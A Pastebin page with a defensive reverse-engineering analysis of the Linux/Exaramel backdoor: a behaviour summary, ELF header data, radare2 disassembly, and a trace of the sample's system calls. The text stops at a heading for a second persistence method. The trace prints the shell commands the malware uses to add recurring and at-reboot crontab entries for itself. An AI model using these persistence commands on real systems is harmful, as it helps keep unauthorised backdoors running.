<!DOCTYPE html>
<html lang="en">
<head>
        <script async src="https://www.googletagmanager.com/gtag/js?id=UA-58643-34"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', "UA-58643-34");
    </script>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie - Pastebin.com</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta name="description" content="Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time." />
    <meta property="og:description" content="Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time." />
            <meta property="fb:app_id" content="231493360234820" />
    <meta property="og:title" content="Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie - Pastebin.com" />
    <meta property="og:type" content="article" />
    <meta property="og:url" content="https://pastebin.com/iKyaqLTd" />
    <meta property="og:image" content="https://pastebin.com/i/facebook.png" />
    <meta property="og:site_name" content="Pastebin" />
    <meta name="google-site-verification" content="jkUAIOE8owUXu8UXIhRLB9oHJsWBfOgJbZzncqHoF4A" />
    <link rel="canonical" href="https://pastebin.com/iKyaqLTd" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=yes">
        <meta name="csrf-param" content="_csrf-frontend">
<meta name="csrf-token" content="q4UQKl9EkBwXcvq5SwldBuCBGq_nab6lwTEopmTNNXHo53VyPQfpelwhz_RzfRFnzeti2LI9zN2kaBvEPb93IA==">

<link href="/assets/c80611c4/css/bootstrap.min.css" rel="stylesheet">        
<link href="/themes/pastebin/css/vendors.bundle.css?ec0a0b6023b5e6c9982d" rel="stylesheet">
<link href="/themes/pastebin/css/app.bundle.css?ec0a0b6023b5e6c9982d" rel="stylesheet">
    
<!-- 0-x2xy94pJ -->
<script type="text/javascript" src="//services.vlitag.com/adv1/?q=adf050ece17b957604b4bbfc1829059f" defer="" async=""></script><script> var vitag = vitag || {};</script>
<!-- End Valueimpression Head Script -->
<script>
     vitag.smartBannerConfig= {
          disablePosition:  "top right left",
     }
</script>
<script type="text/javascript">
        if (window.location.pathname === "/") {
            vitag = vitag || {};
            vitag.outStreamConfig = vitag.outStreamConfig || {};
            vitag.outStreamConfig.enablePC = false;
        }
    </script>
</head>
<body class="night-auto " data-pr="x2xy94pJ" data-pa="" data-sar="1" data-abd="1">


<div class="wrap">

        
        
<div class="header">
    <div class="container">
        <div class="header__container">

                        <div class="header__left">
                <a class="header__logo" href="/">
                    Pastebin                </a>

                <div class="header__links h_1024">
                    
                    <a href="/doc_api">API</a>
                    <a href="/tools">tools</a>
                    <a href="/faq">faq</a>
                                    </div>

                
                <a class="header__btn" href="/">
                    paste                </a>
            </div>

                        <div class="header__right">

                                    <div class="header_sign">
                        <a href="/login" class="btn-sign sign-in">Login</a>
                        <a href="/signup" class="btn-sign sign-up">Sign up</a>
                    </div>
                
            </div>

        </div>
    </div>

</div>
        

    <div class="container">
        <div class="content">

                        
<!-- 0-x2xy94pJ -->
<div style="padding-bottom:20px; padding-top:20px;">
<div class="adsbyvli" data-ad-slot="vi_1282550010"></div><script>(vitag.Init = window.vitag.Init || []).push(function(){viAPItag.display("vi_1282550010")})</script>
</div>

                                    
            
            
<link href="/themes/pastebin/css/geshi/light/lua.css?694707f98000ed24d865" rel="stylesheet">

<div class="post-view">

    
    <div class="details">
                    <div class="share h_800">
                <div data-url="https://pastebin.com/iKyaqLTd" class="share-btn facebook js-facebook-share" title="Share on Facebook!"><span>SHARE</span></div>
                <div data-url="https://pastebin.com/iKyaqLTd" class="share-btn twitter js-twitter-share" title="Share on Twitter!"><span>TWEET</span></div>
            </div>
                <div class="user-icon">
                            <img src="/cache/img/9/2/3/323220.jpg" alt="MalwareMustDie">                    </div>
        <div class="info-bar">
            <div class="info-top">

                                    <span class="unlisted" title="Unlisted paste, only people with this link can see this paste."></span>
                
                
                <h1>Linux/Exaramel backdoor (RE analysis pad) #MalwareMustDie</h1>
            </div>
            <div class="info-bottom">

                                    <div class="username">
                                                    <a href="/u/MalwareMustDie">MalwareMustDie</a>
                                            </div>

                                            <a href="/pro" class="pro" title="PRO User!"></a>
                    
                                             <a href="/message/compose?to=MalwareMustDie" class="message" title="Send a private message to: MalwareMustDie"></a>
                                    
                <div class="date">
                    <span title="Friday 10th of January 2020 03:20:09 AM CDT">Jan 10th, 2020</span>

                                    </div>

                <div class="visits" title="Unique visits to this paste">
                    670                </div>

                <div class="expire" title="When this paste gets automatically deleted">
                    Never                </div>
            </div>
        </div>
    </div>

                        <div class="page">
                <div class="content__text -no-padding">
                    <div class="notice -post-view">
                        <b>Not a member of Pastebin yet?</b>
                        <a href="/signup"><b><u>Sign Up</u></b></a>,
                        it unlocks many cool features!                    </div>
                </div>
            </div>
        
    
    <div class="highlighted-code">
        <div class="top-buttons">
            <div class="left">
                <a href="/archive/lua" class="btn -small h_800">Lua</a> 28.17 KB            </div>

            <div class="right">
                                    <a href="/raw/iKyaqLTd" class="btn -small">raw</a>
                    <a href="/dl/iKyaqLTd" class="btn -small">download</a>
                    <a href="/clone/iKyaqLTd" class="btn -small h_800">clone</a>
                    <a href="/embed/iKyaqLTd" class="btn -small h_800">embed</a>
                    <a href="/print/iKyaqLTd" class="btn -small h_800">print</a>
                
                                    <a href="/report/iKyaqLTd" class="btn -small">report</a>
                
                
                            </div>
        </div>
        <div class="source" style="font-size: px; line-height: px;">
            <ol class="lua"><li class="li1"><div class="de1"><span class="sy0">//</span> Linux<span class="sy0">/</span>Exaramel <span class="br0">&#40;</span>BlackEnergy<span class="br0">&#41;</span> <span class="sy0">-</span> APT ELF malware</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> ref<span class="sy0">:</span> https<span class="sy0">://</span>www<span class="sy0">.</span>virustotal<span class="sy0">.</span>com<span class="sy0">/</span>gui<span class="sy0">/</span>file<span class="sy0">/</span>c39b4105e1b9da1a9cccb1dace730b1c146496c591ce0927fb035d48e9cb5c0f<span class="sy0">/</span>details</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> binary forms <span class="br0">&#40;</span>go<span class="sy0">-</span>lang with <span class="st0">&quot;vendor&quot;</span> installation<span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> quick analysis by @unixfreaxjp on radare2 &amp; tsurugi linux seccon</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> <span class="sy0">*</span><span class="br0">&#41;</span> on going stuff is happening<span class="sy0">,</span> the contents can be changed<span class="sy0">.</span> <span class="sy0">#</span>MalwareMustDie! </div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Summary &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">0</span><span class="sy0">.</span> Checking<span class="sy0">,</span> cloning<span class="sy0">,</span> <span class="kw2">and</span> initiating run space<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">1</span><span class="sy0">.</span> Use both lock <span class="br0">&#40;</span><span class="sy0">/</span>tmp<span class="sy0">/.</span>applock<span class="br0">&#41;</span> file<span class="br0">&#40;</span>unix socket<span class="br0">&#41;</span> &amp; futex <span class="kw1">for</span> protecting a running instance<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp;i<span class="sy0">.</span>e<span class="sy0">.</span> new bins instance will be exusted due to lock file<span class="sy0">,</span> dups clones controlled by futex</div></li>
<li class="li1"><div class="de1"><span class="nu0">2</span><span class="sy0">.</span> Aim persistence <span class="kw2">in</span> cron &amp; systemd startup<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">3</span><span class="sy0">.</span> Read encrypted config file<span class="sy0">,</span> <span class="kw1">if</span> <span class="kw2">not</span> exist drop hardcoded crypt one<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">4</span><span class="sy0">.</span> Grab information &amp; fills the template <span class="kw1">for</span> C2 callbacks<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">5</span><span class="sy0">.</span> C2 establishment<span class="sy0">,</span> sending information after <span class="kw3">read</span> config <span class="kw2">and</span> start listening<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">6</span><span class="sy0">.</span> Host resolving uses libnss<span class="sy0">;</span> Networking supports system proxy<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">7</span><span class="sy0">.</span> Supported to remote command execution<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">8</span><span class="sy0">.</span> My opinion<span class="sy0">:</span> Developer made work<span class="sy0">,</span> <span class="kw2">not</span> crooks<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">9</span><span class="sy0">.</span> Comments<span class="sy0">:</span> https<span class="sy0">://</span>twitter<span class="sy0">.</span>com<span class="sy0">/</span>malwaremustd1e<span class="sy0">/</span>status<span class="sy0">/</span><span class="nu0">1216466744446840837</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Binary Analysis &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="nu0">1</span><span class="sy0">.</span> Machine<span class="sy0">:</span> Advanced Micro Devices X86<span class="sy0">-</span><span class="nu0">64</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">2</span><span class="sy0">.</span> Symbol <span class="kw3">table</span> <span class="st0">'.symtab'</span> contains <span class="nu0">7726</span> entries<span class="sy0">.</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">3</span><span class="sy0">.</span> go build ID</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400fd8</span> &nbsp;<span class="nu0">3133</span> <span class="nu0">3631</span> <span class="nu0">3236</span> <span class="nu0">3730</span> <span class="nu0">3763</span> <span class="nu0">6466</span> <span class="nu0">3136</span> <span class="nu0">6364</span> &nbsp;136126707cdf16cd</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400fe8</span> &nbsp;<span class="nu0">6133</span> <span class="nu0">3231</span> <span class="nu0">3562</span> <span class="nu0">6561</span> <span class="nu0">6435</span> <span class="nu0">3833</span> <span class="nu0">6331</span> <span class="nu0">6665</span> &nbsp;a3215bead583c1fe</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00400ff8</span> &nbsp;<span class="nu0">3765</span> <span class="nu0">3237</span> <span class="nu0">3530</span> <span class="nu0">3636</span> 48c7 <span class="nu0">4424</span> <span class="nu0">1000</span> <span class="nu0">0000</span> &nbsp;7e275066H<span class="sy0">.</span>D$<span class="sy0">....</span></div></li>
<li class="li1"><div class="de1">Notes at offset <span class="nu0">0x00000fc8</span> with length <span class="nu0">0x00000038</span><span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp; Owner &nbsp; &nbsp; &nbsp; &nbsp; Data size &nbsp; &nbsp; &nbsp; Description</div></li>
<li class="li1"><div class="de1">&nbsp; Go &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<span class="nu0">0x00000028</span> &nbsp; &nbsp; &nbsp;Unknown note <span class="kw3">type</span><span class="sy0">:</span> <span class="br0">&#40;</span><span class="nu0">0x00000004</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">4</span><span class="sy0">.</span> Program Headers<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1">&nbsp; Type &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Offset &nbsp; VirtAddr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; PhysAddr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; FileSiz &nbsp;MemSiz &nbsp; Flg Align</div></li>
<li class="li1"><div class="de1">&nbsp; PHDR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000040</span> <span class="nu0">0x0000000000400040</span> <span class="nu0">0x0000000000400040</span> <span class="nu0">0x000188</span> <span class="nu0">0x000188</span> R &nbsp; <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; NOTE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000fc8</span> <span class="nu0">0x0000000000400fc8</span> <span class="nu0">0x0000000000400fc8</span> <span class="nu0">0x000038</span> <span class="nu0">0x000038</span> R &nbsp; <span class="nu0">0x4</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x000000</span> <span class="nu0">0x0000000000400000</span> <span class="nu0">0x0000000000400000</span> <span class="nu0">0x248c80</span> <span class="nu0">0x248c80</span> R E <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x249000</span> <span class="nu0">0x0000000000649000</span> <span class="nu0">0x0000000000649000</span> <span class="nu0">0x1ac10f</span> <span class="nu0">0x1ac10f</span> R &nbsp; <span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOAD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x3f6000</span> <span class="nu0">0x00000000007f6000</span> <span class="nu0">0x00000000007f6000</span> <span class="nu0">0x02f7e0</span> <span class="nu0">0x052400</span> RW &nbsp;<span class="nu0">0x1000</span></div></li>
<li class="li1"><div class="de1">&nbsp; GNU_STACK &nbsp; &nbsp; &nbsp;<span class="nu0">0x000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x000000</span> <span class="nu0">0x000000</span> RW &nbsp;<span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1">&nbsp; LOOS<span class="sy0">+</span><span class="nu0">5041580</span> &nbsp; <span class="nu0">0x000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x0000000000000000</span> <span class="nu0">0x000000</span> <span class="nu0">0x000000</span> &nbsp; &nbsp; <span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">5</span><span class="sy0">.</span> Go syntax v1<span class="sy0">.</span>8</div></li>
<li class="li1"><div class="de1"><span class="sy0">/</span>usr<span class="sy0">/</span>lib<span class="sy0">/</span>go<span class="sy0">-</span><span class="nu0">1.8</span><span class="sy0">/</span>lib<span class="sy0">/</span><span class="kw3">time</span><span class="sy0">/</span>zoneinfo<span class="sy0">.</span>zip</div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">#</span> Static Reversing Analysis &nbsp; <span class="sy0">#</span></div></li>
<li class="li1"><div class="de1"><span class="sy0">###############################</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00455940</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pdf</div></li>
<li class="li1"><div class="de1">┌ <span class="nu0">18</span><span class="sy0">:</span> entry0 <span class="br0">&#40;</span>int64_t arg_8h<span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> arg int64_t arg_8h @ rsp<span class="sy0">+</span><span class="nu0">0x8</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455940</span> &nbsp; &nbsp; &nbsp;488d742408 &nbsp; &nbsp; lea rsi<span class="sy0">,</span> <span class="br0">&#91;</span>arg_8h<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455945</span> &nbsp; &nbsp; &nbsp;488b3c24 &nbsp; &nbsp; &nbsp; mov rdi<span class="sy0">,</span> qword <span class="br0">&#91;</span>rsp<span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455949</span> &nbsp; &nbsp; &nbsp;488d05100000<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>main<span class="br0">&#93;</span> <span class="sy0">;</span> sym<span class="sy0">.</span>go<span class="sy0">.</span>main</div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> <span class="nu0">0x455960</span> <span class="sy0">;</span> <span class="st0">&quot;H\x8d\x05\x89\xc2\xff\xff\xff\xe0\xcc\xcc\xcc\xcc\xcc\xcc\u030b|$<span class="es1">\b</span>\xb8\xe7&quot;</span></div></li>
<li class="li1"><div class="de1">└ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00455950</span> &nbsp; &nbsp; &nbsp;ffe0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp rax</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00455940</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> s sym<span class="sy0">.</span>main<span class="sy0">.</span>main</div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00647540</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pd <span class="nu0">6</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span> CODE XREF from sym<span class="sy0">.</span>main<span class="sy0">.</span>main @ <span class="nu0">0x648803</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="sy0">;</span><span class="co1">-- sym.go.main.main:</span></div></li>
<li class="li1"><div class="de1">┌ <span class="nu0">4808</span><span class="sy0">:</span> sym<span class="sy0">.</span>main<span class="sy0">.</span>main <span class="br0">&#40;</span><span class="br0">&#41;</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">│ bp<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ sp<span class="sy0">:</span> <span class="nu0">105</span> <span class="br0">&#40;</span>vars <span class="nu0">105</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ rg<span class="sy0">:</span> <span class="nu0">0</span> <span class="br0">&#40;</span>vars <span class="nu0">0</span><span class="sy0">,</span> args <span class="nu0">0</span><span class="br0">&#41;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647540</span> &nbsp; &nbsp; &nbsp;64488b0c25f8<span class="sy0">.</span> &nbsp;mov rcx<span class="sy0">,</span> qword fs<span class="sy0">:</span><span class="br0">&#91;</span><span class="nu0">0xfffffffffffffff8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647549</span> &nbsp; &nbsp; &nbsp;488d842408fc<span class="sy0">.</span> &nbsp;lea rax<span class="sy0">,</span> <span class="br0">&#91;</span>rsp <span class="sy0">-</span> <span class="nu0">0x3f8</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <span class="nu0">0x00647551</span> &nbsp; &nbsp; &nbsp;483b4110 &nbsp; &nbsp; &nbsp; cmp rax<span class="sy0">,</span> qword <span class="br0">&#91;</span>rcx <span class="sy0">+</span> <span class="nu0">0x10</span><span class="br0">&#93;</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; ┌─<span class="sy0">&lt;</span> <span class="nu0">0x00647555</span> &nbsp; &nbsp; &nbsp;0f86a3120000 &nbsp; jbe <span class="nu0">0x6487fe</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; │ &nbsp; &nbsp;<span class="nu0">0x0064755b</span> &nbsp; &nbsp; &nbsp;4881ec780400<span class="sy0">.</span> &nbsp;sub rsp<span class="sy0">,</span> <span class="nu0">0x478</span></div></li>
<li class="li1"><div class="de1">│ &nbsp; &nbsp; │ &nbsp; &nbsp;<span class="nu0">0x00647562</span> &nbsp; &nbsp; &nbsp;4889ac247004<span class="sy0">.</span> &nbsp;mov qword <span class="br0">&#91;</span>var_470h<span class="br0">&#93;</span><span class="sy0">,</span> rbp</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp; &nbsp; &nbsp;<span class="sy0">:</span></div></li>
<li class="li1"><div class="de1"><span class="br0">&#91;</span><span class="nu0">0x00647540</span><span class="br0">&#93;</span><span class="sy0">&gt;</span> pdsf</div></li>
<li class="li1"><div class="de1"><span class="sy0">;</span><span class="co1">-- sym.go.main.main: &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647572</span> <span class="kw3">call</span> sym<span class="sy0">.</span>main<span class="sy0">.</span>getCurrentDir</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006475b4</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>concatstring2</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006475d0</span> <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>Now</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647618</span> <span class="kw3">call</span> sym<span class="sy0">.</span><span class="kw3">time</span><span class="sy0">.</span>Time<span class="sy0">.</span><span class="kw5">String</span></div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064768a</span> <span class="kw3">call</span> sym<span class="sy0">.</span>net<span class="sy0">.</span>Listen</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006476d0</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647727</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454c1d fcn<span class="sy0">.</span>00454c1d</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006477ba</span> <span class="kw3">call</span> sym<span class="sy0">.</span>os_signal<span class="sy0">.</span>Notify</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006477f9</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064783c</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x0064787c</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>LoadConfig</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647905</span> obj<span class="sy0">.</span>main<span class="sy0">.</span>defaulthost<span class="sy0">.</span>str <span class="sy0">//</span> <span class="sy0">&lt;======</span> C2 placeholder var</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647968</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_configur<span class="sy0">.</span>UpdateConfig</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647981</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479a7</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479cd</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>makechan</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x006479ea</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647a38</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newobject</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647a63</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454c20 fcn<span class="sy0">.</span>00454c20</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647af4</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454f96 fcn<span class="sy0">.</span>00454f96</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647b01</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>CheckAdapt</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647bbd</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>GetUser</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647be8</span> <span class="kw3">call</span> sym<span class="sy0">.</span>app_vendor_worker<span class="sy0">.</span>__Worker_<span class="sy0">.</span>GetOS</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c27</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newproc</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c51</span> <span class="kw3">call</span> fcn<span class="sy0">.</span>00454bfa fcn<span class="sy0">.</span>00454bfa</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647c77</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>newselect</div></li>
<li class="li1"><div class="de1"><span class="nu0">0x00647ca2</span> <span class="kw3">call</span> sym<span class="sy0">.</span>runtime<span class="sy0">.</span>selectrecv</div></li>
<li class="li1"><div class="de1"><span class="co1">--- more ---</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> <span class="kw3">seek</span> persistency <span class="sy0">#</span><span class="nu0">1</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1">chdir<span class="br0">&#40;</span><span class="st0">&quot;/var/spool/cron&quot;</span><span class="br0">&#41;</span><span class="sy0">,</span> <span class="nu0">1</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null) | grep /test/Exaramel &amp;&amp; echo 'true' || echo 'false'&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/usr/bin/crontab&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;crontab&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-l&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null; echo '*/1 * * * * /test/Exaramel') | crontab -&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">execve<span class="br0">&#40;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="br0">&#91;</span><span class="st0">&quot;/bin/sh&quot;</span><span class="sy0">,</span> <span class="st0">&quot;-c&quot;</span><span class="sy0">,</span> <span class="st0">&quot;(crontab -l 2&gt;/dev/null; echo '@reboot /test/Exaramel') | crontab -&quot;</span><span class="br0">&#93;</span><span class="br0">&#41;</span> <span class="sy0">=</span> <span class="nu0">0</span><span class="sy0">;</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
<li class="li1"><div class="de1"><span class="sy0">//</span> persistency <span class="sy0">#</span><span class="nu0">2</span></div></li>
<li class="li1"><div class="de1">&nbsp;</div></li>
